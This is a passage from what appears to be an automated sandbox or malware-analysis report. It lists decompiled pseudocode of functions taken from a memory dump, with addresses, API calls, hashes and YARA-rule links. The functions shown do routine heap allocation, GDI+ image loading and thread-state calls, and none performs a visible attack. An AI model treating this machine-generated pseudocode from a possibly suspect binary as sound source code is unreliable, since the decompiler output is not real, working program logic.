					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_t58 = _t30 * 0x4ae4 >> 0x20;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t30 * 0x00004ae4) + 0x00000004);
					_t36 = E0027DB02(( ~(_t73 > 0) | _t30 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t65, _t73);
					_pop(0x2a00e0);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E00271788);
						_push(E00271611);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E0027D96D(_t58, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E0027E920(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E00282B53(0x2a00e0); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0x2a00e0 = 0x30c00;
								if(_t39 == 0) {
									E00266D3A(0x2a00e0);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}

0x00272a7f
0x00272a7f
0x00272a84
0x00272a89
0x00272a8a
0x00272a8e
0x00272a90
0x00272a92
0x00272a95
0x00272a9c
0x00272a9d
0x00272aa5
0x00272aa8
0x00272aad
0x00272aad
0x00272ab0
0x00272ab3
0x00272abe
0x00272ac5
0x00272ac7
0x00272aca
0x00272adf
0x00272ae0
0x00272ae5
0x00272ae6
0x00272ae9
0x00272aec
0x00272aee
0x00272af0
0x00272af5
0x00272afa
0x00272afb
0x00272afb
0x00272afe
0x00272b00
0x00272b05
0x00272b06
0x00272b06
0x00272b0b
0x00272b15
0x00272b1c
0x00272b26
0x00272b28
0x00272b2a
0x00272b2d
0x00272b30
0x00272b39
0x00272b40
0x00272b4a
0x00272b4f
0x00272b55
0x00272b58
0x00272b5f
0x00272b5f
0x00272b64
0x00272b64
0x00272b67
0x00272b6c
0x00272b6f
0x00272b6f
0x00272b2d
0x00272b26
0x00272b7a
0x00272b84

APIs

__EH_prolog.LIBCMT ref: 00272A84

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ea7bccda4aad522cc393a7f869bde27fb43c60861d2abd4a7174609d855ccf16
Instruction ID: 1c27113d4de0d35bcc92026485b5e1767b1c476a083d6c2164b70563aad39c89
Opcode Fuzzy Hash: ea7bccda4aad522cc393a7f869bde27fb43c60861d2abd4a7174609d855ccf16
Instruction Fuzzy Hash: FB21B9B1E60216ABDB14DF749C41B6B77B8FF05318F04853AE51DEB681D7709920CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00279EEF, Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00279EEF(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				void* _t47;
				void* _t50;
				short _t55;
				void* _t57;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				_t47 = __ecx;
				E0027D870(E002914E1, _t62);
				_push(_t47);
				E0027D940();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E0026137D(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E00261E9E(_t62 - 0x7d24, _t57, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
					_t50 = _t62 - 0x7d24;
					_t33 = E0026192E(_t57, _t62 - 0x24);
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2);
						_t55 = E00282B53(_t50);
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E0027EA80(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E002615E3(_t62 - 0x24);
					E0026162D(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E0026162D(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}

0x00279eef
0x00279eef
0x00279eef
0x00279ef4
0x00279ef9
0x00279eff
0x00279f05
0x00279f06
0x00279f09
0x00279f13
0x00279f16
0x00279f24
0x00279f28
0x00279f33
0x00279f44
0x00279f47
0x00279f4a
0x00279f4d
0x00279f50
0x00279f56
0x00279f5b
0x00279f61
0x00279f66
0x00279f68
0x00279f6a
0x00279f6d
0x00279f73
0x00279f7a
0x00279f7f
0x00279f81
0x00279f83
0x00279f89
0x00279f8c
0x00279f94
0x00279f85
0x00279f85
0x00279f85
0x00279f9f
0x00279f9f
0x00279fa4
0x00279faf
0x00279fb4
0x00279f35
0x00279f3b
0x00279f40
0x00279f40
0x00279fbb
0x00279fc6

APIs

__EH_prolog.LIBCMT ref: 00279EF4

Part of subcall function 0026137D: __EH_prolog.LIBCMT ref: 00261382
Part of subcall function 0026137D: new.LIBCMT ref: 002613FA

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3da11cee9a9d00723b2c28edc0670e4858fe596674c1dc6a94a01d2fd3009a88
Instruction ID: 0ff49f03484d47cb89326b24b154f59dd7c53c6933b428dd37a54a5a292dc66b
Opcode Fuzzy Hash: 3da11cee9a9d00723b2c28edc0670e4858fe596674c1dc6a94a01d2fd3009a88
Instruction Fuzzy Hash: AB219A71C2424A9ACF14DFA5C9819EEB7F4BF19300F0040EAE809A7202D7356E65CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0026910B, Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0026910B(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t27;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t40;
				void* _t42;
				void* _t49;

				_t35 = __edx;
				E0027D870(E00291321, _t42);
				E00266ED7(_t42 - 0x20, E00267C3C());
				_push( *((intOrPtr*)(_t42 - 0x1c)));
				_push( *((intOrPtr*)(_t42 - 0x20)));
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_t40 = E0026C70F();
				if(_t40 > 0) {
					_t27 =  *((intOrPtr*)(_t42 + 0x10));
					_t37 =  *((intOrPtr*)(_t42 + 0xc));
					do {
						_t22 = _t40;
						asm("cdq");
						_t49 = _t35 - _t27;
						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
							_t40 = _t37;
						}
						if(_t40 > 0) {
							E0026C8C7( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
							asm("cdq");
							_t37 = _t37 - _t40;
							asm("sbb ebx, edx");
						}
						_push( *((intOrPtr*)(_t42 - 0x1c)));
						_push( *((intOrPtr*)(_t42 - 0x20)));
						_t40 = E0026C70F();
					} while (_t40 > 0);
				}
				_t21 = E0026159C(_t42 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t21;
			}

0x0026910b
0x00269110
0x00269122
0x00269127
0x0026912d
0x00269130
0x00269139
0x0026913d
0x00269140
0x00269144
0x00269147
0x00269147
0x00269149
0x0026914a
0x0026914c
0x00269154
0x00269154
0x00269158
0x00269161
0x00269168
0x00269169
0x0026916b
0x0026916b
0x0026916d
0x00269173
0x0026917b
0x0026917d
0x00269182
0x00269186
0x0026918f
0x00269199

APIs

__EH_prolog.LIBCMT ref: 00269110

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2820308e2defff1751de86f471ce55196fae35e892592d09455ec62726f83578
Instruction ID: 00db1d1202d459ce27fb6c7fca4891fd5eb64874ec562ef4ea8830f1e677b97a
Opcode Fuzzy Hash: 2820308e2defff1751de86f471ce55196fae35e892592d09455ec62726f83578
Instruction Fuzzy Hash: A511C2B7E2042A97CF12AF98CC419EEB73AAF48750F214155F81567252CA308DB58AA0

Uniqueness

Uniqueness Score: -1.00%

Function 0027C6FF, Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0027C6FF(void* __ecx, void* __eflags) {
				void* __ebx;
				intOrPtr _t18;
				char _t19;
				char _t20;
				void* _t23;
				void* _t24;
				void* _t26;
				void* _t37;
				void* _t43;
				intOrPtr _t45;

				_t26 = __ecx;
				E0027D870(E00291520, _t43);
				_push(_t26);
				E0027D940();
				_push(_t24);
				 *((intOrPtr*)(_t43 - 0x10)) = _t45;
				E00284D7E(0x2b39fa, "X");
				E0026FB08(0x2b5a1c, _t37, 0x2922e0);
				E00284D7E(0x2b4a1a,  *((intOrPtr*)(_t43 + 0xc)));
				E00265A9F(0x2ab708, _t37,  *((intOrPtr*)(_t43 + 0xc)));
				_t4 = _t43 - 4;
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t18 = 2;
				 *0x2b29d8 = _t18;
				 *0x2b29d4 = _t18;
				 *0x2b29d0 = _t18;
				_t19 =  *0x2a75d4; // 0x0
				 *0x2b185b = _t19;
				_t20 =  *0x2a75d5; // 0x1
				 *0x2b1894 = 1;
				 *0x2b1897 = 1;
				 *0x2b185c = _t20; // executed
				E00267ADF(_t43 - 0x2108, _t37,  *_t4, 0x2ab708); // executed
				 *(_t43 - 4) = 1;
				E00267C55(_t43 - 0x2108, _t37,  *_t4);
				_t23 = E00267B71(_t24, _t43 - 0x2108, _t37);
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t23;
			}

0x0027c6ff
0x0027c704
0x0027c709
0x0027c70f
0x0027c714
0x0027c717
0x0027c724
0x0027c735
0x0027c742
0x0027c753
0x0027c758
0x0027c758
0x0027c764
0x0027c765
0x0027c76a
0x0027c76f
0x0027c774
0x0027c779
0x0027c77e
0x0027c784
0x0027c78b
0x0027c792
0x0027c797
0x0027c7a2
0x0027c7a6
0x0027c7b1
0x0027c7bb
0x0027c7c6

APIs

__EH_prolog.LIBCMT ref: 0027C704

Part of subcall function 00267ADF: __EH_prolog.LIBCMT ref: 00267AE4
Part of subcall function 00267ADF: new.LIBCMT ref: 00267B28

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e39b580fe98af680403388d53473449cbea5bfe7b79aa2ae2176c8bf9e1d6cf8
Instruction ID: 71a4993e9baa9ee180e60af2b02ece5d94f46a4c541810e83f6d227549fb0955
Opcode Fuzzy Hash: e39b580fe98af680403388d53473449cbea5bfe7b79aa2ae2176c8bf9e1d6cf8
Instruction Fuzzy Hash: 3B11C8359292549ED704EBA8BC1ABDC7BB0EB26350F00415EE40866293DBB11AE4CF21

Uniqueness

Uniqueness Score: -1.00%

Function 0028B0DB, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0028B0DB(void* __edx, void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t31;
				char _t32;
				void* _t34;
				intOrPtr* _t36;

				_push(_t26);
				_push(_t26);
				_t16 = E00287B1B(_t26, 0x40, 0x30); // executed
				_t32 = _t16;
				_v12 = _t32;
				_t28 = _t31;
				if(_t32 != 0) {
					_t2 = _t32 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t32 - _t17;
					if(__eflags != 0) {
						_t3 = _t32 + 0x20; // 0x20
						_t36 = _t3;
						_t34 = _t17;
						do {
							_t4 = _t36 - 0x20; // 0x0
							E00289C02(_t28, _t36, __eflags, _t4, 0xfa0, 0);
							 *(_t36 - 8) =  *(_t36 - 8) | 0xffffffff;
							 *_t36 = 0;
							_t36 = _t36 + 0x30;
							 *((intOrPtr*)(_t36 - 0x2c)) = 0;
							 *((intOrPtr*)(_t36 - 0x28)) = 0xa0a0000;
							 *((char*)(_t36 - 0x24)) = 0xa;
							 *(_t36 - 0x23) =  *(_t36 - 0x23) & 0x000000f8;
							 *((char*)(_t36 - 0x22)) = 0;
							__eflags = _t36 - 0x20 - _t34;
						} while (__eflags != 0);
						_t32 = _v12;
					}
				} else {
					_t32 = 0;
				}
				E00287A50(0);
				return _t32;
			}

0x0028b0e0
0x0028b0e1
0x0028b0e8
0x0028b0ed
0x0028b0f1
0x0028b0f5
0x0028b0f8
0x0028b0fe
0x0028b0fe
0x0028b104
0x0028b106
0x0028b109
0x0028b109
0x0028b10c
0x0028b10e
0x0028b114
0x0028b118
0x0028b11d
0x0028b121
0x0028b123
0x0028b126
0x0028b12c
0x0028b133
0x0028b137
0x0028b13b
0x0028b13e
0x0028b13e
0x0028b142
0x0028b145
0x0028b0fa
0x0028b0fa
0x0028b0fa
0x0028b147
0x0028b154

APIs

Part of subcall function 00287B1B: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00288544,00000001,00000364,?,00282E0F,?,?,002A00E0), ref: 00287B5C

_free.LIBCMT ref: 0028B147

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 716850c2e0a7a2cb9eae644337a9ab78ac2f4097770ce849c3152d41cd1ba7f1
Instruction ID: 67cc19ee50b7c510cb979c7da38e8c5c4807ff7c771f4c2ef2b77517261621f0
Opcode Fuzzy Hash: 716850c2e0a7a2cb9eae644337a9ab78ac2f4097770ce849c3152d41cd1ba7f1
Instruction Fuzzy Hash: C5014E762153055BE331DF65C8C695AFBEDEB85370F25051DE194572C0E730A805C734

Uniqueness

Uniqueness Score: -1.00%

Function 00287B1B, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00287B1B(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x2c0874, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00287906();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00287ECC())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00286763(_t15, _t16, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00287b1b
0x00287b21
0x00287b26
0x00287b34
0x00287b34
0x00287b3a
0x00287b3c
0x00287b3c
0x00287b53
0x00287b5c
0x00287b64
0x00000000
0x00000000
0x00287b44
0x00287b46
0x00287b68
0x00287b6d
0x00287b73
0x00000000
0x00287b73
0x00287b49
0x00287b4e
0x00287b4f
0x00287b51
0x00000000
0x00000000
0x00287b51
0x00000000
0x00287b53
0x00287b2c
0x00287b2d
0x00287b32
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00288544,00000001,00000364,?,00282E0F,?,?,002A00E0), ref: 00287B5C

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fb2fbc10fcb0c66ed876bf0c8106ef33b27f4decb6363bfe94fc0071eb17eaa9
Instruction ID: 8b6d7d412fbc70e718d2c1dfe27c15dc7ec91e38aa7d4a2c942969aa48a6d9ad
Opcode Fuzzy Hash: fb2fbc10fcb0c66ed876bf0c8106ef33b27f4decb6363bfe94fc0071eb17eaa9
Instruction Fuzzy Hash: 9DF0B43967B2266A9B227E219C45E5A378A9F51778B388111A8189B2D5DA30DC20C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00265A1D, Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00265A1D(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;

				_t25 = __ecx;
				E0027D870(E00291216, _t36);
				_push(_t25);
				_t34 = _t25;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E0026AD1B(_t25); // executed
				_t2 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E0026FAE6();
				 *(_t36 - 4) = 1;
				E0026FAE6();
				 *(_t36 - 4) = 2;
				E0026FAE6();
				 *(_t36 - 4) = 3;
				E0026FAE6();
				 *(_t36 - 4) = 4;
				E0026FAE6();
				 *(_t36 - 4) = 5;
				E00265C12(_t34,  *_t2);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}

0x00265a1d
0x00265a22
0x00265a27
0x00265a29
0x00265a2b
0x00265a2e
0x00265a33
0x00265a33
0x00265a3d
0x00265a48
0x00265a4c
0x00265a57
0x00265a5b
0x00265a66
0x00265a6a
0x00265a75
0x00265a79
0x00265a80
0x00265a84
0x00265a8f
0x00265a99

APIs

__EH_prolog.LIBCMT ref: 00265A22

Part of subcall function 0026AD1B: __EH_prolog.LIBCMT ref: 0026AD20

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 061bfce7b2c7116bfde6ca6a4956be4ab5f39f9f8b7b55fd130ba8f8b0ecbb6f
Instruction ID: 00f1e36c07a8a5f5e13dccde9bc12bf2a4fc4f296f9a9ff102ab9be16aff9911
Opcode Fuzzy Hash: 061bfce7b2c7116bfde6ca6a4956be4ab5f39f9f8b7b55fd130ba8f8b0ecbb6f
Instruction Fuzzy Hash: 6A01D130939654CADB15E7E4D2053EEB7A49F16310F0005ADE48D53382DBB82F54DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00287A8A, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00287A8A(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00287ECC())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x2c0874, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00287906();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00286763(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00287a8a
0x00287a90
0x00287a96
0x00287ac8
0x00287acd
0x00287ad3
0x00000000
0x00287ad3
0x00287a9a
0x00287a9c
0x00287a9c
0x00287ab3
0x00287abc
0x00287ac4
0x00000000
0x00000000
0x00287aa4
0x00287aa6
0x00000000
0x00000000
0x00287aa9
0x00287aae
0x00287aaf
0x00287ab1
0x00000000
0x00000000
0x00287ab1
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00282FA6,?,0000015D,?,?,?,?,00284482,000000FF,00000000,?,?), ref: 00287ABC

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02f9dffa41ac6517da8c4f574f4c05b8332dd7069020ccaf7abd6a535ac141b0
Instruction ID: 773cb96bfff896eb2ce75aa19e2ef221bb5b0959bb0f8d9f148023fe18fd4bed
Opcode Fuzzy Hash: 02f9dffa41ac6517da8c4f574f4c05b8332dd7069020ccaf7abd6a535ac141b0
Instruction Fuzzy Hash: 3FE0E52D57B12376E6253B255D44B5E3A48EB813B1F390121EC14960D0CF60DE2087E1

Uniqueness

Uniqueness Score: -1.00%

Function 002702E8, Relevance: 1.5, APIs: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E002702E8() {
				void* __esi;
				void* _t2;

				E00270FAF(); // executed
				_t2 = E00270FB4();
				if(_t2 != 0) {
					_t2 = E00266CC9(_t2, 0x2a00e0, 0xff, 0xff);
				}
				if( *0x2a00eb != 0) {
					_t2 = E00266CC9(_t2, 0x2a00e0, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}

0x002702ea
0x002702ef
0x00270300
0x00270305
0x00270305
0x00270311
0x00270316
0x00270316
0x0027031d
0x00270325

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 0027031D

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 759e7ca8eec4636bd6bb90b7de8f5ed7c4f89fbf4e34e66f8930564b504acf9f
Instruction ID: 16f5210e9cbfe1dd09f69ea7ead38933f11f6b995e2c08c9f919918db410924e
Opcode Fuzzy Hash: 759e7ca8eec4636bd6bb90b7de8f5ed7c4f89fbf4e34e66f8930564b504acf9f
Instruction Fuzzy Hash: 60D0C210630550D3DA213724B8CD7FE16074F82310F08406BF04D262D28E6508AE8AA2

Uniqueness

Uniqueness Score: -1.00%

Function 002795CF, Relevance: 1.5, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E002795CF(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L0027D7F6();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E0027938E(__eax, _a4, _a8); // executed
				return _t6;
			}

0x002795d2
0x002795d3
0x002795d5
0x002795da
0x002795df
0x00000000
0x002795f0
0x002795e9
0x00000000

APIs

GdipAlloc.GDIPLUS(00000010), ref: 002795D5

Part of subcall function 0027938E: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 002793AF

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
Instruction ID: d9f930085973f758ffbc9d7f7f91ecc3b9e04588e8a2f5cb0c5cea3b6d3f5eb2
